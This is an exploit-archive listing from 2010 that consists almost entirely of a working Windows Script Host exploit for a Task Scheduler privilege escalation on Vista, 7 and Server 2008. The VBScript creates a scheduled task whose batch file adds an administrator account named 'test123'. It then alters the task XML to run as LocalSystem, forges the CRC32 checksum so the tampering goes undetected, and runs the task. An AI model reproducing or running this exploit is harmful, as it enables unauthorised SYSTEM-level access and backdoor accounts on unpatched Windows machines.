Windows Task Scheduler Privilege Escalation

2010-11-24T00:00:00
ID PACKETSTORM:96104
Type packetstorm
Reporter webDEViL
Modified 2010-11-24T00:00:00

Description

                                        
                                            `# Exploit Title: Windows Task Scheduler Privilege Escalation 0day  
# Date: 20-11-2010  
# Author: webDEViL  
# Tested on: Windows 7/2008 x86/x64  
  
  
<job id="tasksch-wD-0day">  
<script language="Javascript">  
  
crc_table = new Array(  
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,  
0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,  
0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,  
0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,  
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,  
0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,  
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,  
0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,  
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,  
0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,  
0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,  
0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,  
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,  
0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,  
0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,  
0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,  
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,  
0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,  
0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,  
0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,  
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,  
0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,  
0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,  
0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,  
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,  
0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,  
0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,  
0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,  
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,  
0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,  
0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,  
0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,  
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,  
0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,  
0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,  
0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,  
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,  
0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,  
0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,  
0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,  
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,  
0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,  
0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,  
0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,  
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,  
0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,  
0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,  
0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,  
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,  
0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,  
0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,  
0x2D02EF8D  
);  
  
var hD='0123456789ABCDEF';  
  
function dec2hex(d) {  
h='';  
for (i=0;i<8;i++) {  
h = hD.charAt(d&15)+h;  
d >>>= 4;  
}  
return h;  
}  
function encodeToHex(str){  
var r="";  
var e=str.length;  
var c=0;  
var h;  
while(c<e){  
h=str.charCodeAt(c++).toString(16);  
while(h.length<3) h="0"+h;  
r+=h;  
}  
return r;  
}  
function decodeFromHex(str){  
var r="";  
var e=str.length;  
var s=0;  
while(e>1){  
  
r=r+String.fromCharCode("0x"+str.substring(s,s+2));  
  
s=s+2;  
e=e-2;  
}  
  
return r;  
  
}  
  
  
function calc_crc(anyForm) {  
  
anyTextString=decodeFromHex(anyForm);  
  
Crc_value = 0xFFFFFFFF;  
StringLength=anyTextString.length;  
for (i=0; i<StringLength; i++) {  
tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;  
Table_value = crc_table[tableIndex];  
Crc_value >>>= 8;  
Crc_value ^= Table_value;  
}  
Crc_value ^= 0xFFFFFFFF;  
return dec2hex(Crc_value);  
  
}  
  
function rev_crc(leadString,endString,crc32) {  
//  
// First, we calculate the CRC-32 for the initial string  
//  
anyTextString=decodeFromHex(leadString);  
  
Crc_value = 0xFFFFFFFF;  
StringLength=anyTextString.length;  
//document.write(alert(StringLength));  
for (var i=0; i<StringLength; i++) {  
tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;  
Table_value = crc_table[tableIndex];  
Crc_value >>>= 8;  
Crc_value ^= Table_value;  
}  
//  
// Second, we calculate the CRC-32 without the final string  
//  
crc=parseInt(crc32,16);  
crc ^= 0xFFFFFFFF;  
anyTextString=decodeFromHex(endString);  
StringLength=anyTextString.length;  
for (var i=0; i<StringLength; i++) {  
tableIndex=0;  
Table_value = crc_table[tableIndex];  
while (((Table_value ^ crc) >>> 24) & 0xFF) {  
tableIndex++;  
Table_value = crc_table[tableIndex];  
}  
crc ^= Table_value;  
crc <<= 8;  
crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);  
}  
//  
// Now let's find the 4-byte string  
//  
for (var i=0; i<4; i++) {  
tableIndex=0;  
Table_value = crc_table[tableIndex];  
while (((Table_value ^ crc) >>> 24) & 0xFF) {  
tableIndex++;  
Table_value = crc_table[tableIndex];  
}  
crc ^= Table_value;  
crc <<= 8;  
crc |= tableIndex;  
}  
crc ^= Crc_value;  
//  
// Finally, display the results  
//  
var TextString=dec2hex(crc);  
var Teststring='';  
Teststring=TextString.substring(6,8);  
Teststring+=TextString.substring(4,6);  
Teststring+=TextString.substring(2,4);  
Teststring+=TextString.substring(0,2);  
return Teststring  
}  
function decodeFromHex(str){  
var r="";  
var e=str.length;  
var s=0;  
while(e>1){  
  
r=r+String.fromCharCode("0x"+str.substring(s,s+2));  
  
s=s+2;  
e=e-2;  
}  
  
return r;  
  
}  
</script>  
  
  
  
<script language="VBScript">  
dim output  
set output = wscript.stdout  
output.writeline " Task Scheduler 0 day - Privilege Escalation "  
output.writeline " Should work on Vista/Win7/2008 x86/x64"  
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf  
biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"  
Set objShell = CreateObject("WScript.Shell")  
objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True  
  
Set fso = CreateObject("Scripting.FileSystemObject")  
Set a = fso.CreateTextFile(biatchFile, True)  
a.WriteLine ("net user /add test123 test123")  
a.WriteLine ("net localgroup administrators /add test123")  
a.WriteLine ("schtasks /delete /f /TN wDw00t")  
  
Function ReadByteArray(strFileName)  
Const adTypeBinary = 1  
Dim bin  
Set bin = CreateObject("ADODB.Stream")  
bin.Type = adTypeBinary  
bin.Open  
bin.LoadFromFile strFileName  
ReadByteArray = bin.Read  
'output.writeline ReadByteArray  
End Function  
  
Function OctetToHexStr (arrbytOctet)  
Dim k  
OctetToHexStr = ""  
For k = 3 To Lenb (arrbytOctet)  
OctetToHexStr = OctetToHexStr _  
& Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)  
Next  
End Function  
strFileName="C:\windows\system32\tasks\wDw00t"  
  
hexXML = OctetToHexStr (ReadByteArray(strFileName))  
'output.writeline hexXML  
crc32 = calc_crc(hexXML)  
output.writeline "Crc32 Original: "+crc32  
  
  
Set xmlDoc = CreateObject("Microsoft.XMLDOM")  
'permissions workaround  
'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True  
'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True  
Set objShell = WScript.CreateObject("WScript.Shell")  
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")  
  
Do Until objExecObject.StdOut.AtEndOfStream  
strLine = strLine & objExecObject.StdOut.ReadLine()  
Loop  
hexXML = "FFFE3C00"+OctetToHexStr(strLine)  
'output.writeline hexXML  
Set ts = fso.createtextfile ("wDw00t.xml")  
For n = 1 To (Len (hexXML) - 1) step 2  
ts.write Chr ("&h" & Mid (hexXML, n, 2))  
Next  
ts.close  
  
xmlDoc.load "wDw00t.xml"  
Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")  
Author.text = "LocalSystem"  
Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")  
UserId.text = "S-1-5-18"  
xmldoc.save(strFileName)  
  
hexXML = OctetToHexStr (ReadByteArray(strFileName))  
  
leadString=hexXML+"3C0021002D002D00"  
endString="2D002D003E00"  
'output.writeline leadString  
impbytes=rev_crc(leadString,endString,crc32)  
output.writeline "Crc32 Magic Bytes: "+impbytes  
  
finalString = leadString+impbytes+endString  
forge = calc_crc(finalString)  
output.writeline "Crc32 Forged: "+forge  
  
strHexString="FFFE"+finalString  
Set fso = CreateObject ("scripting.filesystemobject")  
Set stream = CreateObject ("adodb.stream")  
  
Set ts = fso.createtextfile (strFileName)  
  
For n = 1 To (Len (strHexString) - 1) step 2  
ts.write Chr ("&h" & Mid (strHexString, n, 2))  
Next  
ts.close  
  
  
Set objShell = CreateObject("WScript.Shell")  
objShell.Run "schtasks /change /TN wDw00t /disable",,True  
objShell.Run "schtasks /change /TN wDw00t /enable",,True  
objShell.Run "schtasks /run /TN wDw00t",,True  
  
</script>  
</job>  
  
`